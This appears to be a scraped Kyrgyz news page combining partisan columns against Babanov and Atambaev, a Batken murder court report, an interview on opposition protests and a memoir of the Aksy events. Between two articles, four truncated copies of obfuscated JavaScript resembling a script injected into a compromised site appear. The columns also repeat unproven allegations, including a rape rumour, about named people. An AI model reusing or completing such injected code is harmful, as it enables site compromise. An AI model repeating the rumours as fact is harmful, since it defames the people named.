Тилекке каршы, буга чейин Камчы Көлбаевдин санаалаш- пикирлеши болуп жүргөн, «Республика» партиясынын активдүү мүчөсү Калыбек Нургожоевди премьер-министр Т.Сариев «Солнышко» мамлекеттик ишканасына директор кылып, ушул жылдын 1-мартында дайындаган. Мына факт! Те­мке эл астында аксына сүйлөп, бирок, көшөгө артынан кылмыштуу топтун мүчөлөрүнөн  кадр кое баштаганыбы? Ушунчалык да эки жуздүүлүккө барабы?

Айтмакчы, убагында «Рес­публика» партиясынан Ка­лыбек Нургожоев Кара-Балта шаардык кеңешине депутат ка­тары шайланган. Мына ушундан эле Өмүрбек Бабанов кимдер менен алака түзүп, кандай жолдор менен саясатта оюн кылып атканын түшүнсөңөр болобу?

«Республика – Ата Журттан» депутат болгон Талант Мамытовду билесңер да. Баягы Камчыбек Ташиев Ак үйдүн тосмосун аттап өтүп, калайманды салып, бийликти

басып алмакчы болгондо, дал ушул Талант мырза мамлекеттик күзөт кызматындагылар менен мушташканы көпчүлүктүн  эсинде. Мамлекеттик эң башкы объектини кайтарган кызматкерлерге мындай сокку жасаганы, өзү  депутат болуп туруп, деги эле ушундай жүрүш-турушу менен көзгө көрүнгөнү кайсы логикага сыят? Дагы бир «Республика – Ата Журттун» көрүнүктүү депутаты Улан Чолпонбаевди (тиги дүйнөдөгү каймана аты «Хоп») ким билбейт? Уба­гында Камчы Көлбаев менен камыр-жумур аралаш жүргөнү боюнча ММКларга жазылган болчу.

Баса, бир убакта В.Хон ме­нен Э.Бабановдун ортосунда чыр болуп, бизнес талашуу жагынан сенсация жаралган. Ошондон көп өтпөй  В.Хон ур-тепкиге алынганын билебиз. Анан таластык иниси катары «Сакалдын» аты чыкканы кан­дай? БӨТтүн ал жагынан да байланышы бар беле? «Республика – Ата Журттун» бакандай колдоочусу, «Искра Строй» курулуш компаниясынын директору Нарынбек Сариевдин чуулганы коомчулукту таңгалдырган. Интер­нет булактарында «16 жашар кызды зордуктады» деген маалыматтын канчалык деңгээлде чындыгы бар? «Шамал болбосо чөптүн башы кыймылдабайт» дегендей, бул суроо да ачык бойдон калууда…

Кыскасы, Өмүрбек Бабановдун жогорудагы саясый үзөңгүлөштөрү, партиясынын бакандай мүчөлөрү кандай маанидеги адамдар экенин көрүп атасыңар. Бүгүнкү  бийликтин кылмыштуулукка, коррупцияга каршы күрөшүү багытын алганын билебиз. Деги эле сая­сый элита жана чиновниктердин таза болушуна замандын талабы  каттуу коюлган. Өкүнүчтүүсү ушул. Анда неге БӨТтүн айланасын бийлик башындагылар  сыдырыгыа салып, туура баасын бербейт? Качанкыга чеийн унчукпай отурушат?

Белек Айдарбеков

Булак: “АЗИЯньюс”

Өз бир тууганын жана жеңесин бычактап өлтүргөн делген айыпталуучунун бөгөт коюу чарасы белгиленди

Тергөө иштери жүргүзүлгөнгө чейин адам өмүрүн кыйган деген жагдайда кылмышка шектүү Баткен шаарынын Кызыл-Жол кварталынын тургуну Б.С. атту жаран 2 (эки) айга камакка алынды. Кылмышка шектүү мурда соттолгон эмес.

Баткендин Кызыл-Жол кварталынын тургуну Б.С. үстүбүздөгү жылдын 15-март күнү атайылап башка кишинин өмүрүн кыйуу максатында өз үйүнөн аш бычакты алып, Баткен шаарындагы базарда эт сатып иштеген бир тууган агасы Б.С. аттуу жаранды кандайдыр бир келишпөөчүлүктөн улам өзү алып келген аш бычак менен сол көкүрөгүнө урган. Кылмышка шектүү ал жерден чыгып, бир тууган агасы жашаган үйгө барып, камыр жууруп жаткан жеңеси Б.А.нын бетинин сол жак тарабына бычак уруп, анан сол көкүрөгүнө сайып салган.

Баткен райондук соту 2016-жылдын 17-мартында Кыргыз Республикасынын КЖКнин 97-ст. 2-б. 1,6-п.п. (Киши өлтүрүү, эки же андан ашык адамды өзгөчө мыкаачылык менен) беренелери менен айыпталып жаткан соттолуучунун бөгөт койуу чарасы катары  Б.С.га карата 2 (эки) айга камакка алуу чечимин кабыл алды.

Наралы Асанбаев, журналист: "Оппозиция эмес, Атамбаев өзү кан көксөп жатабы?"

Алмазбек Атамбаев КМШ өлкөлөрүнүн президенттери жыйналып жыйын өткөрүп жатканда, Өзбекстандын президенти Ислам Каримовго “Өткөндү унутсак, келечек бизди жазалайт” деп айтты эле. Бирок, президентибиз өзү бийликке кандай жол менен келгенин, кимдер менен чогуу жүргөнүн, буга чейин басып өткөн жолун, көргөн каралоосун заматта унутуп койгонсуду.
Көчөт олтургузганы ишембиликке чыгып, журналисттердин суроосуна жооп берип жатып “Биздин мамлекетте оппозиция болобу, башкасы болобу чогуу иштегени жакшы. Албетте, кемчиликтер бар, алар ачык айтылышы керек. Бирок сөзсүз эле чогулуп, төңкөрүш жасайм дегендерди мен оппозиция деп айтпайм, алар – эл бузарлар, эл душманы. Кыйкырып чыккандардын арты таза эмес. Кыйкыргандардын артында жалаң кан же уурулук бар. Ачык айтайын, алар канга тойбогон кузгунга окшош бузукулар ” – деп айтканы, кечээ Ош шаарына барып,  суу топтоочу жаңы резервуардын ачылышына катышып, эл менен жолукканда “Оппозициядагылар бийликти эңсегендер. Алар шайтандын кулдары. Мына биз беш жылда көп нерсеге жетиштик. Коңшулардан ашып кеттик” деген сөздөрү көп талкууну жаратты. Президенттикке жеткиче  бийликке оппозиционер Алмазбек Шаршенович ким эле? – ушул суроого жооп издеп көргүм келди.
Досторун эмес, бийликти биринчи планга койгон кез
Акаевдик режим кулап, Бакиев президенттикке олтурган алгачкы жылдары оппозиция бир муштумга түйүлүп, катуу талаптарды коюп, борбордук “Ала-Тоо” аянтында митинг өткөзүп, бийликтин шаштысын алып койгон. Бакиев Конституцияны өзгөртүүдөн башка аргасы да калган эмес. Ошол учурда Алмазбек Атамбаев оппозициянын катарында жүргөн. Бирок, бир кайыкта сүзүп бараткандардын ой-тилегин таш каптырып, уурданып барып, Бакиев сунуш кылган премьер-министрликке макулдугун берип, санаалаштарынын, пикирлештеринин артынан бычак сайгандай эле болгон. Бул тууралуу Кубатбек Байболов парламенттен “Алмаз досум, сен биздин аркабыздан бычак сайдың! Ой-тилектерибиздин баарын таш талканын чыгардың” деп айтканы бар. Байболовду ушул сөзү үчүн Алмазбек Атамбаев такыр кечире албайт. Ошол кезде бийлик менен элдин ортосунда көпүрө болом деп келген Атамбаев, сынык көпүрө бойдон калып кетти.
2007-жылы “Бириккен Фронт” түзүлүп, митинг уюштурат. Аянтка боз үйлөр тигилген. Митингге чыккан элди бийлик резине ок менен атып, иттер менен талатып кууган. Боз үйлөрдү талкалашкан. Бул учурда Атамбаев премьер-министр болчу. Аянтка чыккан элди “казелдор, барандар” деп боктогон азыркы президент эле.  “Президент Бакиев көптөргө жакпай турганын билем. Бизде андан башка президент болчу адам жок. Бакиев менен иштешүүгө болот” деп айткан дагы Атамбаев эмес беле. Аны кантип танып кете алабыз? “Бириккен Фронттун” лидерлеринин бири Өмүрбек Суваналиевден маек алганымда  “Чогулган элди Ак үйдүн тегерегинен Москва көчөсү менен алып кеткенге карабай, кайрылып келатканда бизди газ, резина ок менен атып, иттер менен талатып куушкан. Жоону чаап келгендей мактанышкан. Аянтта тизилип турган боз үйлөрдүн түндүктөрүн сындырышып, КАМАЗдарга ыргытышкан. Азыркы президент А.Атамбаев кызуу болуп алып, аянтка чыгып “козелдор, барандар” деп элдин баарын боктогон. Кийин мен Коргонуу, коопсуздук бөлүмүнүн башчысы болгонумда “Бирикке Фронтту” аянттан куугандан кийин биз резиденцияда арак ичтик, ошол жерде күпүлдөдүк. Атамбаев кызуу болуп алып түз эле аянтка келген” деп айтышкан. Мына, Атамбаевдин чыныгы жүзү” деп айтып берген.   (“Жаңы Ордо” гезити, №30 (374), 12-октябрь, 2012-жыл)
Бул бүгүнкү президенттин ошол учурдагы “шефи” Бакиевге жагынайын деп жасаган жоругу деп билсе болот.  Атамбаев оппозициядагыларды өзүндөй көрүп, бийлик үчүн баарын жасайт деген ой менен “Алар бийликти эңсегендер” деп айтып жатса керек.  Сегиз ай премьер-министр болуп иштеген соң Бакиевдин колунан “Даанакер” орденин алып, жумуштан кетип жатканда дагы  бир нерседен үмүт экенсип “ Мен Бакиевге терең ыраазымын. Биз Курманбек Салиевич менен көптөн бери достошуп жүрөбүз. Эсимде, 2003-жылы менин туулган күнүмдө “Курманбек Салиевич, кийинки президент сиз болосуз!” деп айткам. Кээ бир оппозиция лидерлери менен түрмөдө Феликс Куловдун камересында талашканыбыз да эсимде, ошондо дагы “президент Бакиев болот!” деп айткам” деп айтканын ажобуз Атамбаев өзү унутса да, көпчүлүктүн эсинде.
Чогулуп төңкөрүш жасайм дегендер эл бузарлар, эл душманы
Президенттин бул сөзүнө мен дагы кошулам. Карапайым калктын, кырчындай жигиттердин, азаматтардын каны менен бийликке жеткендер эл бузарлар, эл душмандары. Атамбаев да премьер-министрликке митингдин аркасы менен жеткен. Президенттикке дагы жүзгө жакын азаматтын канын төккөн окуянын аркасы менен жетип олтурат. Анда Атамбаевди деле эл бузар, эл душманы деп айтабызбы? Феликс Кулов “Ашууда” деген китебинде “Алмазбек Атамбаев миңдей адам өлсө да биз бийликти тартып алабыз” деп айтканын жазат. Кулов Жогорку Кеңештин депутаты, “Ар-Намыс” фракциясынын лидери болуп турганда   “Жаңы Ордо” гезитине берген маегинде дагы Атамбаевдин ал айтканы чындык экенин тастыктаган. Ошол маектин ток этер жерин гана мисал келтирейин:
“- Ашууда” деген китебиңизде “Алмазбек Атамбаев миңдей адам өлсө да биз бийликти тартып алабыз!” деп айтканын жазган элеңиз.

  • Ооба, Атамбаев мага бул туурасында айткан…”

Жаңы Ордо” гезити, №01 (345), 27-январь, 2012-жыл)
Бул Атамбаев оппозицияда жүргөндө кандай жол болбосун эптеп бийликке жетсем деп аракет кылганынын далили да. Ажобузга бийликке жетүү үчүн миңдей адамдын канын төгүү кара чымынды садагага чапкандай  эле кеп экен. Атамбаев адам канын төгүү менен бийликке жетебиз деп Куловго гана айткан эмес. 2009-жылы оппозициядан президенттикке жалгыз талапкер болуп чыкканда, бир кезде пикирлеш, санаалаш, партиялаш болуп жүргөн Жусупжан Жээнбековго да адам канын төгүү максаты бар экенин билдирген. “Канга тойбогон кузгунга окшош бузукулардын” кан төгүү тууралуу кеп кылганына далил катары Жусупжан Жээнбековдун маегин кыскача берейин:
“- Ошол жерде Атамбаев “Бийликти кан төгүү менен болсо да алабыз!” деп айтканын угуп калгам. Чындап эле ошентип айткан беле?

  • Алмаз Атамбаев “Шайлоонун эртеси күнү аянтка БШКга миңдеген адам менен барабыз дагы шайлоо комиссиясына санатабыз. Кан төгүлсө дагы санатабыз!” деп айткан сөзү бар. Мен ошондо сен эмне элди граждандык согушка түртүп жатасыңбы? Муну токтоткунуң! Утулсак утулдук, утсак уттук дешибиз керек дегем. Ал түнү саат сегизден он экиге чейин талаш-тартыш болгон”

(“Жаңы Ордо” гезити, №02 (304), 21-январь, 2011-жыл)
Бул айткандарын Алмазбек Шаршенович азыр эстей албай жатса керек. “Канга тойбогон кузгундун” сөздөрүн өзү мындан 7-8 жыл мурун оозанып койгон. Алланын периштелери пенде түз сүйлөсө деле, тескери сүйлөсө деле “Оомин” деп коёт эмес. Атамбаев дагы Кудай деген киши да. Сүйлөсө сөзсүз Кудайды күбө тартып сүйлөйт.  Анын “Адамдын каны төгүлсө дагы бийликти тартып алабыз” деп айтканына периштелер “Оомин” кылып коюшса керек. 7-апрелде токсондой эр-азаматтын каны төгүлбөдүбү. Мүмкүн, ажобуз бийликти таза шайлоо жолу менен утабыз деп оозанганда, кан төгүлбөй, бийликке таза шайлоо аркылуу жетмек беле деген ой жаралбай койбойт.
Кыргызстанды бөлүп-жаргысы келген лидер
Кыргызда “Өзүнүн башындагы төөнү көрбөй, бирөөнүн башындагы чөптү көрөт” деген сөз бар. Бүгүн Атамбаев дал ошондой болуп жатат. Оппозицияны “эл бузарлар” деп айтып, кечээ эле өзүнүн ким экенин унутту. 2009-жылы президенттикке талапкер болуп чыккан Алмазбек Атамбаев Базар-Коргон районунун Акман айылына “бөдөнөнүн сүтүнө” же “жинди сууга” тоюп алып, төрт жагынан төрт жан сакчысы жандап, жыйынга көтөрүп  барганы элдин эсинен  кетпесе керек.  Атамбаев коштоп жүргөн адамдар менен  түндө Жалал-Абад шаарындагы мейманкада 40 градус күчү бар “таза суудан” серпишип олтуруп, кызып калганда, аны Жалал-Абаддан тосуп алган Жусупжан Жээнбеков менен айтыша кетип, жалалабаддыктарды боктоп кирген. Ошол түнү ажобуздун оозунан кандай сөз чыкканын, мейманканада кандай окуя болгонун Жээнбековдун маеги толук ачып берген:
“ – Депутаттык мандатыңызды өз эркиңиз менен таштап кеткениңизди билебиз. Ошондо коомчулукта “Жээнбеков мандатын Атамбаев менен келише албай таштап кетти” деген сөздөр тараган болчу. Келишпестиктер болду беле?

  • Биринчиден баламды издешим керек эле. Мыйзам боюнча үгүт иштерине катышпашым керек болчу. Атамбаев “Менин жанымда жүрөсүң, Токтогулга барасың” дегенде, мен барбайм деп болбой койгом. Кийин Жалал-Абадка дегенде макул болуп баргам. Ал Аксыдан келди. Мен Базар-Коргондон тосуп алдым. Кечинде мейманканага барганда сөгүнө баштады. “Мага жакшы мейманкана алып койбодуң!” деп. Барган мейманканабыз Жалал-Абаддагы эң жакшы мейманканалардын бири болчу. Ички жан дүйнөсүндө мени менен урушайын деген ниети бар окшойт, же партиясынан мени кетирүүнүн жолун ойлоп жатканбы, билбейм. Ошол жерден айтышып кеттик. Ага Азимбек Бекназаров күбө. Чынын айтайын Алмазбек Атамбаев ошондо көп ичип алган болчу. Мен Азимбектин көзүнчө “Азимбек оң кулак, сол кулагың менен уккунуң! Жалал-Абад элине Атамбаев ыраазы болсо болот болчу. Жалалабаддыктар премьер-министр кылды. Бирок, бул жалалабаддыктарга бир жолу ырахматын айтып койгон жок. Кайра Жалал-Абаддын элин сөгүп жатат. Мунусу сени да, мени да сөккөндүгү. Эми буга окшогон адам менен бир жерде олтурбайм, саясатта жүрбөйм дедим да чыгып кеттим. Эртеси депутаттык мандатты тапшырыпгам.
  • Эмне деп сөккөнүн билсек болобу?
  • Атамбаев “Нах…мне нужны джалалабадцы. Без твоего Джалал-Абада обойдусь” жана башка оозго алгыс уят сөздөрдү айткан Мас болчу деп айтпадымбы…”

(“Жаңы Ордо” гезити, №02 (304), 21-январь, 2011-жыл)
Атамбаевдин элди бөлүп жарган, эл бузардын сөзүн сүйлөгөнү жалгыз бул гана эмес. Коомдук ишмер, саясаттын казанында жүрүп такшалып калган Бекболот Талгарбеков:
“ … Атамбаев башкы атаандашы Ташиевге айткан сунушу мындай: “Мен түндүккө эле президент болом. Түштүктүн мага кереги жок. Ал жакты бөлүп Түштүк Кыргыз Республикасын жарыялагыла. Мадумаров экөөңөр бириң президент, бириң премьер болгула” деп жазат. Президент ишке киришип жатып, өлкөнүн бүтүндүгүн сактайм деп ант берет эмеспи. Атамбаевдин түштүктү бөлүп, Түштүк Кыргыз Республикасы деп жарыялагыла деп айтканы президенттин сөзүбү? Элди ойлогон адамдын оозунан ушундай сөз чыгышы мүмкүнбү? Кыргызстанды бөлүп-жарганга, түндүк, түштүк республикаларын түзүүгө кыргыз эли Атамбаевге укук берген эмес, бербейт дагы. Бул көлөкөсүнөн корккон адамдын гана оозунан чыкчу сөз.
 
Кечээги айтканын бүгүн танган ажо
Ажобуз мындан 7-8 жыл мурун оппозицияда жүрүп айткандарын азыр унуткандыр. Бирок, бийликке келгенден кийинки мезгилин унутушу мүмкүн эмес болчу. Бийлик колго тийген кездеги сөздөрүн да унутуп коюп жатпайбы, кашайып.  2010-жылы электр энергиясынын баасын көтөрүү күнөө деп айтканын ажобуз эстей албайт экен. Жанында акыл кошчу азаматтар ошол учурда Алмазбек Шаршенович эмне деп айтканын эстетип койсо бүгүн уят болбойт болчу. Журналисттер менен жолугушуу учурунда  “Азыр аймактарда электр энергиясына болгон тарифтерге нааразычылыктар башталууда. Сиздин 2010-жылы тарифтер көтөрүлбөйт деген сөзүңүз бар эле. ушул боюнча позицияңыз? деген суроого “Мен 2010-жылы эч качан тариф көтөрүлбөйт деп айтпагам. Менин башым бар го ордунда. Сөздү чаташтырбай чындыкты айткыла да. Мен бирдеме айтсам баарын кылам” деп кайра суроо берген журналистти ыңгайсыз абалга калтырган.
Көчүгүндө калбыры бар болсо эмне жүрөт? Камап, кустурбайсызбы урматтуу президент!
Кыйкырып чыккандардын арты таза эмес деп айттыңыз урматтуу президент. Көчүгүндө калбыры бар болсо алар эмне үчүн эркиндикте жүрөт? Коррупция менен катуу күрөшөм деп жүрөсүз. Кимдин арты таза эмес экенин так айтпайсызбы? Эл кимдердин көчүгүндө калбыры бар экенин билсин. Кимдин артынан ээрчий турганын эл билүүсү зарыл да. Калктын, мамлекеттин казынасына суук колдорун салып, азыр кыйкырып жүргөндөр болсо алардын чжалгыздап эмес, дүңүнөн камап, жеген акчаларын кайра казынага кустурганга сизде толук мүмкүнчүлүк бар. Сын айтып койгондордун баарын арты таза эмес деп күнөөлөө сиз айтчу сөз эмес урматтуу президент. Хандын сөзү жерде калбашы керек. Арты таза эместердин аты-жөнүн КТР аркылуу жарыялаңыз. Ошондо гана сиздин айткан сөзүңүз чындык болот. Болбосо президенттин сөзү деле катын ушак катары кала бермекчи.
Сындагандар душман эмес, мактап жүрүп жардан учургандар душман 
Президенттин таяна турган бийликтеги командасы жана дүнүйө мүлк, байлыгы боло турган болсо, азыр Атамбаевге таяныч боло турган командасы жок. “Улуу урматтуу” деп тегерегинде жүргөндөрдүн баары жолдон кошула калгандар. Алар эч убакта таяныч болуп бере албайт. Буга чейинки президенттерге да таяныч болуп берген эмес. Атамбаевдин башына иш түшкөндө баары чилдей тарап кетишет. Ажо оппозицияда жүргөндө ага каршы ар кандай интригаларды уюштуруп бийликте жүргөндөр азыр деле ошол жылуу орундарында. Булар оппозициянын табиятын түшүнбөгөндөр. Ошол үчүн эл душманына теңеп жатышат. Президентти байлыгы да оор кырдаалдан сактап кала албайт. Муну бир эмес эки жолу көрбөдүкпү. Ооба, Атамбаев мурункуга караганда иргелип алды. Мүлкүн 10 млн долларга баалаганы да ырас. Бирок, андан 10 эсе көп байлыгы бар Акаевдерди, миллиардерлер клубуна кирген Максим Бакиевди деле байлыгы сактап кала алган жок. Андыктан, ачуу чындыкка чычалабай, айланага  бир сыйра көз чаптырып койгон ашыктык кылбайт, Алмаз Шаршенович.
Эрктүү болуп элдин эсинде калыңызчы президент мырза  
16-март күнү Ошто “Беш жылда жакшы жетишкендиктерге жеттик. Коңшу өлкөлөрдөн ашып кеттик” деп айттыңыз. Бирок, беш жылда сиз ойлогондой өлкө өнүккөн жок. Тескерисинче, экономика артка кетип, келечек туңгуюк болуп, элдин жону жукарды. Коңшуналарыбыздан ашып кетпей эле, бери дегенде 10-15 жыл артта калдык. Казакстандын абалы менен Кыргызстандын абалын салыштырууга мүмкүнбү Алмаз Шаршенович? Же Өзбекстандан ашып кеттик деп мактана алабызбы? Чет өлкөгө барып, карызга акча сурап келүү менен экономика толтуруу бул өнүккөндөн кабар бербесе керек. Бул наны жок калган үй-бүлөө, коңшусунан нан сурап жегендей эле кеп. “Оппозиция келсе таш бараңга алгыла!” дегендей кеп кылдыңыз. Бул элди бири-бирине тукуруу болуп саналат. Оппозиция эмес, сиз кан көксөп жатасызбы? Кыргызды кыргызга таш ыргытып, душман кылайын деген ойдосузбу? Түшүнбөдүк сизге, президент мырза. Ушул да өлкө башчысы, президент элине айта турган сөзбү? Анда канга тойбогон кузгун ким болуп калат? Оппозициябы же президентти?… Журт башы эч качан элин бири-бирине тукурбайт. Ал эл атасынын оозунан чыкчу сөз эмес. Президенттикти Жараткан ар бир пенденин пешенесине жаза бербейт. Президент болгон адам тарыхта кала турган иш жасашы керек.  Россия ыдырап, тарап кетчү абалга жеткенде Ельцин жалпы орус элинен кечирим сурап, бийликти Путинге өткөрүп берип тарыхта калды. Сиз дагы “Мага беш жыл убакыт бердиңер. Мен беш жыл аралыганда эч нерсе жасай албадым, колумдан да келбеди. Мени кечиргиле кыргыз элим. Мен өз каалоом менен президенттиктен кеттим. Өзүңөр кийинки президентти тандап алгыла!” деп жар салып, кызмат менен коштошуп кете берсеңиз, эрдик кыласыз.  Эрктүү президент атыгат элеңиз. Болбосо, президенттиктин да аброю түшүп бүтмөй болду.
Наралы Асанбаев, журналист
Булак: “Жаңы ОРДО”

Сабыр Муканбетов, серепчи: “Атамбаев оппозиция коюп жаткан сын-талаптарга тыкыр көңүл бөлүүсү зарыл, "колуңардан келгенди кылгыла" деп дөөгүрсүгөндө акылдуулуктун жыты жок”

“Эгер сен отуз жашка чейин социалист болбосоң, анда сенин жүрөгүң жок. Эгер сен 50 жаштан кийин консерватор болбосоң, анда сенин мээң жок”  У.Черчилль
–Сабыке, көрүнбөй кеттиң го? Ызы-чуу болгон жерлерде эле алдыңкы планда жүрчү элең. Жаз менен кошо жер-жерлерде нааразычылык акциялары өтүп, оппозициячыл күчтөр жыйылып, биригип жатса, сен жоксуң? Кайдасың?
–Кыргызстанда эле жүрөм. Айыл жакта. 25 жыл оппозиция тарапта жүрсөм эле азыр дагы ошол жактан издеп жатсаң керек. Мен азыр эл тараптамын. Элибиз бүгүн бийликке да ичи чыкпай, оппозицияны деле колдобой аңкайып турат. Эки жолу ханды тактан кулатышса да “толк” чыкпагандан кийин эмне кылаарын билбей абдырап калды. Мен деле чын жүрөгүмдөн “турмушту өзгөртөбүз” деген ишеним менен 25 жыл өмүрүмдү коомдук ишке арнап, ачка-ток жүрүптүрмүн. Убакыт учкан куш тура… Коңшуларга салыштырмалуу алдыга жылып, демократиялык нормалар орногону менен жалпы жыйынтыкка, экономикалык абалыбызга көңүлүм толбой, пессимисттик маанайга басылып жүрөм. Биз көксөгөн Кыргызстан мындай эмес болчу. “Антип коебуз, минтип койобуз”, “Конституцияны башкача жаза салабыз, анан жыргап калабыз!” дегенибиздин баары чала-жапайы менталитетибизге барып чабылып, таш-талканы чыгып калды го. “Ойлогон ойду кыстаган турмуш жеңет” деп кыргыз бекер айтпаптыр. Өсүш үчүн, өзгөрүш үчүн убакыт керек экен да…
–Жер-жерлерде өткөн митингдерде ар кандай талаптар айтылды, Бектур Асанов “Атамбаев кетсин!” деп талап койду. Азимбек Бекназаров “ар кайсы топтор өз билгенин айтып жатат, жалпы оппозициянын талабы 24-мартта Ош шаарында айтылат” дегенсиген ойду айтууда. Кандай дейсиң, оппозиция опурулуп атып, козголоң чыгып, тополоңго айланып кетпейби?
–Мен жогоруда айткан сөзүм менен оппозицияны сындап, “алар керексиз” дегеним жок. Биригишсин, сындашсын, талаптарын кое беришсин, тек стабилдүүлүктү бузуп, төңкөрүш жасашпаса экен! Кайра Убактылуу өкмөт куруп, кайра мародерлор каптап, кайра мөөнөтсүз шайлоо өткөзүп, жаңы бийликти легитимдештирип, убакыт, каражат коротуп, артка кеткенге акыбыз барбы? Азыр элибиз ушундай ойдо. Бийликке канча нааразы болуп жатса да, стабилдүүлүктүн бузулушун каалабай турат.
Ошол эле учурда, “оппозициянын ана башы болобуз” деп дүргүп жаткандардын көбү калктын калың катмарына жек көрүндү болуп калгандыктан, колдоо таппай жатат. Ошон үчүн мен, баягы анекдоттогу “айга барган” кыргыздай болуп, “жөн эле” турам да. Элдин арасында. Бийлигин деле мактабай, оппозициясын деле боктобой. Экинчиден, балдарым ата болуп, неберелер чоңоюп, биз деле алтымышка таяп калыптырбыз. Негизгиси “радикалдуу кадамдардан майнап чыгат” деген ишеним жок! Андай ишеним болгондо, “бөрү карыса бир койлук…” деп кайрадан топ жарып, эл баштагандан качпас элем!
Ал эми бийлик тууралуу оппозициянын айтып жаткандарын уксаңыз, аларды да колдогуңуз келет. Себеби, эл ичиндеги нааразычылыктар, жан күйгөндөн чыккан сөздөр айтылып, элдин сөзү оппозициянын оозунан чыгып жатпайбы. Оппозиция ойдон чыгарган жери жок, коомдун пикирин чагылдырууга аракет жасап жатат да. “Жарашып, жарашпай жатканы, көтөнү пок” экени башка кеп, көйгөйлөр турмуштан алынганына көңүл буруу керек. Ушул өңүттөн алып караганда, бийликтин позициясы көңүл толоорлук эмес. Оппозиция тараптагыларды душман катары көрүп, медиа айдыңда келекелеп, “силерди эл колдобойт, колуңардан пок келбейт, керек болсо давить этип таштайбыз” деген сыяктуу жүрүм-турумда акылдуулуктун жыты жок. Мурдагы эки президент да ушинтип атып куулуп кеткени сабак болуусу керек да. Азыр ушинтип, “билгениңерди кылгыла” деп дөөгүрсүп жатышып, “оюндан от чыгат” болуп, арты тополоңго айланып кетсе не болот? Же эмне, Кудайдан алган гарантиясы барбы бул бийликтин? Андыктан, Алмазбек Атамбаев оппозиция коюп жаткан сын-талаптарга тыкыр көңүл бөлүүсү зарыл. Оппозиция өкүлдөрүнүн констуктивдүү бөлүгү менен кызматташууга барып, өзүнүн айлана-чөйрөсүн да иргеп, элге жек көрүндү болгондордон арылып, коомдун талаптарын аткарышы керек!
Оппозиция тарап да “ойноп сүйлөсөң да, ойлоп сүйлө” дегенди эстен чыгарбаса. Антпесе, Бектурга окшоп, “Атамбаев кетсин!” дегенди ким колдойт? Болгону бир жарым жыл мөөнөт калган кезде “кетсин” деп, кетирип, анан мөөнөтсүз шайлоо жасап, өткөн эки президенттердин заманындагыдай мыйзамсыз бийлик алмашуулар, туруксуз, коогалаң жашоону кайра кайтаруу кимге керек?
Сурат Жылкычиев
Булак: “АЗИЯnews
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Элнура Кулуева, журналист: "Аксы окуясына 14 жыл... 14 жыл жетпеген чындык"

Аксы окуясына саясий баа берилгени менен качан укуктук баа берилет деп чындыктын чылбырын кармаганыбызга мына быйыл туптуура 14 жылдын жүзү болуптур. Дале баш катырманын ичинде ким атууга буйрук берген? Ким күнөөлүү? деген суроолор жоопсуз. Бирок учур келгенде бул кандуу окуянын чыныгы күнөөкөрлөрүнүн аты аталаар. Мезгил барасы өз акыйкаттуулугун чыгараар деген ой менен калем сооротуп келе жатам.
Аксы окуясын башынан биринчи чагылдырган журналист катары бүгүн ал кандуу окуяны негедир башка өңүттө эстегим келип олтурат. Ушул убакка чейин биринчи күндөгү окуяларды эскерүү иретинде жазган эмесмин. “Китеп кылуу вариантында жазып бербейсиңби” деп кайрылышканда, эң оболу Аксы окуясына укуктук баа берилип, көксө суучу чекит коюлсун анан жазаармын деп жооп кайтаргам. Ай жылга айланган сайын алты өмүр эстутумга айланып, окуянын чындыгы алыстап бараткандай.
“Аалам” элдик эркин гезитте иштеп, 2001-жылы 27-декабрда депутат Азимбек Бекназаров менен маек уюуштуруп, ал маекте “бийлик тараптан коркутуулар болуп жатат” деп жооп бергенин биринчи планга алып чыгып жазган элем. Жаңы жылдык шаани менен депутаттын ал сөздөрүнө коомчулук анча маани бербей калган болуш керек. 5-январь күнү А.Бекназаровду камакка алды деген маалыматты редакцияга келип уктум. Иш телефон шыңгырап, ушул окуяга байланыштуу маалымат жыйынына болгону жатканын кабарлап Турсунбек Акун мени чакырды. Эч нерседен коркпогон Т. Акун депутаттын камалышы Үзөңгү-Куушка байланыштуу саясий “заказ” деп бакылдап чыкты. Бекназаровдун камалышы ошол учурда оппозицияны чок карматкандай ойготкон. Башкы прокуратуранын алдында адамдар пикетке чыгып, милиция кармап, айтор, баягы эле окшош көрүнүштөр.
Азимбек Бекназаровдун жубайын таап маек алуу максатында барсам, кан басымы жогорулап, саламаттыгы начар экенине күбө болуп, коргоо штабынан маалымат алуу үчүн келдим. Ал жерден Аксыда эл көтөрүлгөнү жатат деп угуп 12-январь түнү укук коргоочу менен Кербенге жөнөп калдык. Кычыраган кыш. Төө-Ашуудан машинанын дөңгөлөгү тайгаланып, жол коркунучу тамактан муунтат. Кербенге жетмегибиз өтө тозок болду. Тегененин тар жолу менен кетебиз деп машина жолдо калды. Көр оокаттын айынан көмүр казгандар алдыбыздан жондоруна каптарын көтөрүп бейкам өтүп жатышты. Кар кечип, жонго чыгыш үчүн машина түртүп атып, бутубуз чылпылдап суу болду. Сырткы суук жондон алса буттагы суу ичтен алып аябай азап чектик. Караңгы болгондо араң Кербенге келдик. Райондун борбору негедир тынч. Бейтааныш үйгө кирип, буттарыбызды кургатып жатсак “сиздер башка машина менен кетишиңер керек, Бишкектен келген машиналардын баарын текшерип атат. Силердин коопсуздугуңуздарды ойлоп жатабыз. Бишкектен журналисттер келиптир деп СНБнын кызматкерлерине көрсөтмө бериптир” – деп бир жигит көзү алайып кирип келди. Эмне болсо 